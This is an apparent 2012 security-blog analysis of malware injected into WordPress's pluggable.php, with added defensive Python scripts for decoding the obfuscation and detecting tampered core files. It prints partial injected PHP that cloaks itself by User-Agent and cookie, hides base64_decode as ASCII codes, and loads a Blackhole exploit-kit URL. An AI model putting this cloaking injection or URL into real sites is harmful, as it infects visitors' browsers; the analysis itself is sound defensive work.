
WordPress Pluggable.php Being Compromised

August 15, 2012, by Daniel Cid


Over the last few days we have seen a large number of WordPress sites compromised with a hidden malware payload that lands inside wp-includes/pluggable.php. This is not a WordPress vulnerability; WordPress is simply being targeted as the host.

This malware is not new, and we have been seeing variations of it since June 2012. However, over the last few days the number of compromised sites has multiplied, prompting this post.

We are still tracking down how the sites are getting hacked, but so far we have noticed a few similarities between them.

What’s Happening?


This is what gets added to pluggable.php, typically around lines 810-811 (the listing is truncated where the original is, and quotes are shown as PHP would need them):

$__name = "RANDOMMD5"; // per-site cookie name, a random 32-character hex string
if(1>0 AND !preg_match("#(Firefox.3)|(opera)|(chrome)|..(wget)|(yahoo)|(yandex)#i", $_SERVER["HTTP_USER_AGENT"]) AND empty ($_COOKIE[$__name])) { // 1>0 is always true; the real gate is the User-Agent test plus the cookie test
error_reporting(0); // suppress any PHP warnings so nothing odd shows on the page
$date = date("D, j M Y 00:00:00", time()+60*60*24*30); // cookie expiry, 30 days out
$cookie = time().".".rand(1111111, 9999999);
echo "<script type=\"text/javascript\">document.cookie = \"".$__name."=\"+escape('".$cookie."')+\"; expires=".$date."; path=/\";"; // mark this visitor so the payload is served only once
$__f = implode("", array_map("chr", explode(" ", "98 97 115 101 54 52 95 100 101 99 111 100 101"))); // the ASCII codes spell "base64_decode"
echo $__f("PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmluc..

If you are not familiar with PHP, this is conditional malware. The code inspects the visitor's browser and only emits the payload when a few conditions are met: the User-Agent must not be Opera, Chrome, or Firefox 3, the request must not come from a crawler or fetch tool (Google, Yahoo, Yandex, wget, etc.), and the visitor must not already carry the cookie the script sets. Because the cookie lives for 30 days, each victim receives the payload once; a second visit, or a fetch with an excluded User-Agent, gets a clean page, which is why site owners and scanners often miss it.
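Decoding the obfuscation and reproducing the gate, as an added example that is not code from the post or from the malware itself: the script below pulls the indicators out of a constructed PHP block shaped like the one above, rebuilds the function name hidden as a list of ASCII codes, base64-decodes the payload, and simulates the User-Agent and cookie test so you can see which visitors would receive it. The sample block, its cookie name and its harmless placeholder payload are constructed for the example, and the regex alternative elided in the post is filled in with "google" as an assumption.

```python
import base64
import re

# Constructed sample modelled on the block quoted in the post (not the live malware).
# The cookie name, the "(google)" alternative and the base64 payload are placeholders.
PLACEHOLDER_JS = '<script type="text/javascript">alert(1)</script>'
SAMPLE_PHP = '''
$__name = "d41d8cd98f00b204e9800998ecf8427e";
if(1>0 AND !preg_match("#(Firefox.3)|(opera)|(chrome)|(google)|(wget)|(yahoo)|(yandex)#i", $_SERVER["HTTP_USER_AGENT"]) AND empty ($_COOKIE[$__name])) {
error_reporting(0);
$__f = implode("", array_map("chr", explode(" ", "98 97 115 101 54 52 95 100 101 99 111 100 101")));
echo $__f("{B64}");
}
'''.replace("{B64}", base64.b64encode(PLACEHOLDER_JS.encode()).decode())

# Patterns for the four indicators that give this injection its shape.
NAME_RE = re.compile(r'\$__name\s*=\s*"([0-9a-f]{32})"')
UA_RE = re.compile(r'preg_match\("#(.*?)#i",\s*\$_SERVER\["HTTP_USER_AGENT"\]\)')
CHR_RE = re.compile(r'array_map\("chr",\s*explode\(" ",\s*"([\d ]+)"\)\)')
B64_RE = re.compile(r'\$__f\("([A-Za-z0-9+/=]+)"\)')


def decode_chr_list(numbers: str) -> str:
    """Rebuild a function name the malware hides as space-separated ASCII codes."""
    return "".join(chr(int(n)) for n in numbers.split())


def analyse(php: str):
    """Extract cookie name, UA exclusion regex, hidden function and decoded payload.

    Returns None when the source does not carry the chr-list/base64 shape.
    """
    chr_m = CHR_RE.search(php)
    b64_m = B64_RE.search(php)
    if not (chr_m and b64_m):
        return None
    hidden = decode_chr_list(chr_m.group(1))
    payload = None
    if hidden == "base64_decode":
        payload = base64.b64decode(b64_m.group(1)).decode("utf-8", "replace")
    name_m = NAME_RE.search(php)
    ua_m = UA_RE.search(php)
    return {
        "cookie_name": name_m.group(1) if name_m else None,
        "ua_exclude": ua_m.group(1) if ua_m else None,
        "hidden_function": hidden,
        "payload": payload,
    }


def would_serve_payload(ua_exclude: str, cookie_name: str, user_agent: str, cookies: dict) -> bool:
    """Mirror the PHP gate: !preg_match(UA regex) AND empty($_COOKIE[$__name])."""
    ua_blocked = re.search(ua_exclude, user_agent, re.IGNORECASE) is not None
    # PHP's empty() is true for a missing cookie, for "" and for the string "0".
    cookie_empty = cookies.get(cookie_name, "") in ("", "0")
    return not ua_blocked and cookie_empty


if __name__ == "__main__":
    info = analyse(SAMPLE_PHP)
    print(info)
    ie = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
    print("IE, no cookie:", would_serve_payload(info["ua_exclude"], info["cookie_name"], ie, {}))
```

To reproduce the behaviour from outside, request the page with a desktop Internet Explorer User-Agent and no cookies (curl's -A option sets the header); a request from wget, from a browser on the exclusion list, or a second request that carries the cookie gets the clean page.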

Decode and Analyze


Looking at the exclusions, the malware is aimed at Windows users running Internet Explorer or a current version of Firefox (only Firefox 3 is excluded). After decoding the malware, we understand why. The following JavaScript is executed in the browser:

<script type="text/javascript">document.cookie = "db6c..eed1f235454f7=" + escape('123.456') + "; expires=Fri, 14 Sep 2012 00:00:00; path=/";..
<script type="text/javascript">pal=0; pal-=5884; his=0.0034;his--;wax=7474;if(wax>0.0101){was=0.0106;cap=0.0359;if(cap<7740){hon=7;hon++}}kue=23;if..

The variable names and numeric junk are randomized per site, so the opening of the payload differs from one infection to the next. Often it starts as:

kos=26;   kos+=8147;zag=2832;pic=17;pic++;ins=..

or

ama=0.001;  if(ama>0){you=7336;you-=7397;chi=11;chi++}dun=0.035;dun--;pah=2404;pah--;

or

vac=0.0012;if(vac==0.0075){irk=null}foy=null;kop=9;kop+=17;bid=sea

Where’s it start


There are many other variations. Once decoded, the script attempts to load additional exploit code from:

http://qckdqxeu.co.tv/ckp2wnzxwiwrq41

From there it tries to exploit the visitor's browser with the Blackhole Exploit Kit. Be advised that other domains under .co.tv are doing the same thing; it is not limited to the one we point out here. More to come on that!

This exploit kit focuses on Windows vulnerabilities. AVG Threat Labs' page for the Phoenix Exploit Kit also shows a slight increase in activity.
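Finding the modification on disk, as an added example that is not part of the original post: the script below hashes a pristine copy of the same WordPress release, compares it with the live install, reports modified, missing and unexpected files, and then greps a flagged file for the literal strings that appear in the injected block. The two directory trees, the tampered pluggable.php and the dropped file name are constructed inside a temporary directory so the example runs offline; on a real server the reference tree is a fresh download of the exact version you run.

```python
import hashlib
import os
import tempfile

# Literal strings from the injected block quoted in the post; cheap triage markers.
INJECTION_MARKERS = ('$__name = "', 'array_map("chr", explode(" "')


def sha256_of(path):
    """Stream a file through SHA-256 so large core files do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map relative path -> sha256 for every regular file under root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = sha256_of(full)
    return manifest


def compare(live_root, reference_manifest):
    """Report files that differ from, are missing from, or are absent in the reference."""
    live = build_manifest(live_root)
    modified = sorted(p for p in live if p in reference_manifest and live[p] != reference_manifest[p])
    missing = sorted(p for p in reference_manifest if p not in live)
    unexpected = sorted(p for p in live if p not in reference_manifest)
    return {"modified": modified, "missing": missing, "unexpected": unexpected}


def grep_markers(path):
    """Second check on a flagged file: which injection marker strings does it carry?"""
    with open(path, "r", errors="replace") as f:
        text = f.read()
    return [m for m in INJECTION_MARKERS if m in text]


def make_demo_trees():
    """Construct a clean reference tree and a live tree tampered the way the post describes."""
    base = tempfile.mkdtemp(prefix="wpcheck_")
    clean, live = os.path.join(base, "clean"), os.path.join(base, "live")
    core = {  # constructed stand-ins for real core files
        "wp-includes/pluggable.php": "<?php\nfunction wp_mail() {}\n",
        "wp-includes/functions.php": "<?php\nfunction wp_die() {}\n",
        "index.php": "<?php\nrequire 'wp-blog-header.php';\n",
    }
    for root in (clean, live):
        for rel, body in core.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as f:
                f.write(body)
    tampered = os.path.join(live, "wp-includes", "pluggable.php")
    with open(tampered, "a") as f:  # append a block with the same shape as the injection
        f.write('$__name = "0123456789abcdef0123456789abcdef";\n'
                '$__f = implode("", array_map("chr", explode(" ", "98 97 115 101")));\n')
    dropped = os.path.join(live, "e99a18c428cb38d5f260853678922e03.php")  # constructed name
    with open(dropped, "w") as f:
        f.write("<?php // placeholder for a dropped file\n")
    return {"clean": clean, "live": live, "tampered": tampered,
            "reference": os.path.join(clean, "wp-includes", "pluggable.php")}


if __name__ == "__main__":
    trees = make_demo_trees()
    report = compare(trees["live"], build_manifest(trees["clean"]))
    print(report)
    for rel in report["modified"]:
        print(rel, "->", grep_markers(os.path.join(trees["live"], rel)))
```

WP-CLI's `wp core verify-checksums` performs the same comparison against the checksums wordpress.org publishes for each release. Either way, replace a modified core file with a clean copy rather than editing the injected lines out, keep the manifest somewhere the web server cannot write, and treat a file that is clean today and modified again tomorrow as proof that the entry point is still open.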

As always, we will post more details when we have it.


Categories: Website Malware Infections, WordPress SecurityTags: Hacked Websites, Malware Updates

About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Reader Interactions

Comments

  1. Desmond

    August 16, 2012

    Thanks so much for the post!! Any word on how it's getting in? I've cleaned out my files twice, changed all passwords, and made sure everything was up to date... and it's back. It keeps adding a random 32-string file to my root as well as base64 code to the index files.

  2. sarabjeet singh

    October 3, 2012

    I really like that you are providing information on PHP and MySQL with basic JavaScript. Being enrolled in http://www.wiziq.com/course/5871-php-mysql-with-basic-javascript-integrated-course, I was looking for such information online to assist me with PHP and MySQL, and your information helped me a lot. Thanks.

  3. ABL

    June 1, 2015

    My pluggable.php files are being compromised this week across 10 sites on my server, and I don't know what to do! Any help you can provide?!
